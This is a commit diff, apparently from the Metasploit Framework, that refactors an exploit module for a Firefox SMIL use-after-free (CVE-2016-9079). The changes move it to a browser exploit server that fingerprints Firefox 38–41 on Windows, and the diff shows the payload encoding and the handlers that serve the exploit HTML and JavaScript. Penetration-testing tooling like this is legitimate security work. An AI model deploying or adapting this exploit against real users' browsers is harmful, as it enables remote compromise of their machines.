Land #7895, Update firefox_uaf_smil to use BrowserExploitServer

2017-02-01 16:42:39 -06:00 · 2017-02-01 16:42:39 -06:00 · b4a9bfc7a9
parent 321fa91c75 3c6fa12aca
commit b4a9bfc7a9
1 changed files with 19 additions and 23 deletions
--- a/modules/exploits/windows/browser/firefox_smil_uaf.rb
+++ b/modules/exploits/windows/browser/firefox_smil_uaf.rb
@ -8,7 +8,7 @@ require 'msf/core'
  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking

-    include Msf::Exploit::Remote::HttpServer
+    include Msf::Exploit::Remote::BrowserExploitServer

    def initialize(info={})
      super(update_info(info,
@ -25,9 +25,17 @@ require 'msf/core'
            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
          ],
          'Platform'       => 'win',
+          'BrowserRequirements' =>
+            {
+              source:  /script/i,
+              os_name: OperatingSystems::Match::WINDOWS,
+              ua_name: HttpClients::FF,
+              # Fixed in Firefox 50.0.2
+              ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
+            },
          'Targets'        =>
          [
-            [ 'Mozilla Firefox',
+            [ 'Mozilla Firefox 38 to 41',
              {
                'Platform' => 'win',
                'Arch'     => ARCH_X86,
@ -40,11 +48,11 @@ require 'msf/core'
            'InitialAutoRunScript' => 'migrate -f'
          },
          'References'     =>
-          [
-            [ 'CVE', '2016-9079' ],
-            [ 'Bugzilla', '1321066' ]
-          ],
-          'Arch'           => ARCH_X86,
+            [
+              [ 'CVE', '2016-9079' ],
+              [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
+              [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
+            ],
          'DisclosureDate' => "Nov 30 2016",
          'DefaultTarget'  => 0
        )
@ -60,7 +68,7 @@ require 'msf/core'
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
-    base_uri = "#{get_resource.chomp('/')}"
+    base_uri = get_module_resource

    # stuff that gets adjusted alot during testing

@ -248,28 +256,16 @@ require 'msf/core'
    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end

-  def is_ff_on_windows(user_agent)
-    target_hash = fingerprint_user_agent(user_agent)
-    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
-      return false
-    end
-      return true
-  end
-
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, browser_info)
    print_status("Got request: #{request.uri}")
    print_status("From: #{request.headers['User-Agent']}")
-    if (!is_ff_on_windows(request.headers['User-Agent']))
-      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
-      send_not_found(cli)
-      close_client(cli)
-      return
-    end
+
    if request.uri =~ /worker\.js/
      print_status("Sending worker thread Javascript ...")
      worker_js(cli)
      return
    end
+
    if request.uri =~ /index\.html/ or request.uri =~ /\//

      print_status("Sending exploit HTML ...")